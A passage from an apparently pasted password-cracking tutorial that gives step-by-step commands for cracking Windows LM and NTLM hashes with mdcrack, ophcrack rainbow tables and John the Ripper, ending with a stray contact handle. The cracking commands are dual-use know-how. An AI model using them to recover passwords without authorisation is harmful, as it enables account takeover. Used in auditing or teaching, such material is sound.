- need to bruteforce all possible characters combinations. Once you have TESTTEST, feed a custom character
- set of tesTES to mdcrack and it will return the proper case password much faster than if you did not limit the
- character set.
- # wine MDCrack-sse.exe --charset=tesTES --algorithm=NTLM1 D280553F0103F2E643406517296E7582
- If you know the password length you can use:
- # wine MDCrack-sse.exe --charset=tesTES --algorithm=NTLM1 --minsize=8 --maxsize=8
- D280553F0103F2E643406517296E7582
- The password is TestTest however mdcrack 1.8.3 returns sestTest. I filed a bug report with Gregory
- Duchemin, the author of mdcrack, and he has fixed the problem with version 1.8.4.
- 3.3.1.4 Using Ophcrack
- 3.3.1.4.1 Cracking the LM hash
- download ophcrack and the rainbow tables from http://sourceforge.net/project
- /showfiles.php?group_id=133599. If you have the hard drive space I would recommend downloading XP free
- fast formally known as SSTIC04-5K. If this is a demo or do not have a lot of disk space download XP free
- small formally known as SSTIC04-10K. This is not a typo; SSTIC04-5K is a larger download than
- SSTIC04-10K. You can also purchase the XP Special table which contain longer passwords and the special
- characters. There are special tables for Vista. The small table is Vista free and is free. There is a table you can
- purchase called Vista Special which contains hashes for passwords up to 8 characters. See
- http://ophcrack.sourceforge.net/tables.php for the details. The rainbow tables that ophcrack uses are NOT
- compatible with the rainbow tables generated by rtgen.
- 1. # tar -xvzf ophcrack-2.4.1.tar.gz
- 2. # cd ophcrack-2.4.1
- 3. # ./configure
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 14 of 45 2/15/2010 3:48 PM
- 4. # make
- 5. # make install
- 6. # ophcrack
- 7. click on the load button and select the appropriate option, I will select local SAM.
- 8. click on the tables button and select the rainbow table you installed.
- click on the launch button. You will see pre-loading table boxes on the screen. You may also see a
- message that says "All LM hashes are empty. Please use NThash tables to crack the remaining hashes."
- This means that the administrators have disabled windows ability to save LM hashes.
- 9.
- 10. wait until ophcrack is done
- 3.3.1.4.2 Cracking the NTLM hash
- You will have to purchase the NTLM rainbow tables from http://www.objectif-securite.ch/en/products.php.
- The rainbow table contains 99% of passwords of made of following characters:
- length 1 to 6:
- 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;&<
- =>?@[\]^_`{|}~ (space included)
- length 7:
- 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
- length 8:
- 0123456789abcdefghijklmnopqrstuvwxyz
- You CANNOT generate your own rainbow tables for ophcrack to use. If you know that the password meets
- the above specs you can purchase the table and give it a try.
- 3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
- There is no way to do this. If ophcrack cracks the LM hash you should switch to john or mdcrack to get the
- NTLM password.
- 3.3.2 Using Windows Tools
- 3.3.2.1 John the Ripper
- 3.3.2.1.1 Cracking the LM hash
- 1. download john the ripper from http://www.openwall.com/john/
- 2. open a command prompt (Start, Run, cmd, enter)
- cd to where you extracted john (I extracted john to the root of my C drive) so it would be cd
- \john171w\run
- C:\> cd \john171w\run
- 3.
- john only needs to know the path to the hash.txt to begin bruteforcing and return the uppercase
- password
- C:\> john-386 C:\hash.txt
- 4.
- 3.3.2.1.2 Cracking the NTLM hash
- skype : yamod.gas
Add Comment
Please, Sign In to add comment